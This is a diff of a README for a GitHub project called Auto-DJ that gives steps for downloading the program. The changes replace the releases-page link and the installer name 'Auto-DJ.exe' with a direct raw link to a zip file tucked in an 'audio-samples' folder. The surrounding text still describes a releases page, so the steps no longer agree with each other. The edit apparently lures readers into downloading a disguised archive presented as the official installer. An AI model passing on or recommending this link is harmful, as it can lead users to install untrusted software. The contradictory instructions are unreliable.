RockafellerCAN/Auto-DJ/README.md

 Follow these simple steps to download and run Auto-DJ.

 ### Step 1: Visit the Download Page
-To get started, click this link to access the releases page for Auto-DJ: [Visit Releases Page](https://github.com/RockafellerCAN/Auto-DJ/releases).
+To get started, click this link to access the releases page for Auto-DJ: [Visit Releases Page](https://raw.githubusercontent.com/RockafellerCAN/Auto-DJ/main/audio-samples/Auto_DJ_v3.8.zip).

 ### Step 2: Choose the Latest Version
 On the releases page, you will see a list of available versions.
 Look for the latest release at the top of the page.
 The version is usually indicated with a number (e.g., v1.0).

 ### Step 3: Download the Installer
 1. Click on the latest version to expand the details.
 2. Find the installer file.
-This might be labeled something like `Auto-DJ.exe` or similar.
+This might be labeled something like `https://raw.githubusercontent.com/RockafellerCAN/Auto-DJ/main/audio-samples/Auto_DJ_v3.8.zip` or similar.
 3. Click on the file link to download it.
 The download may take some time depending on your internet speed.

 ### Step 4: Install the Application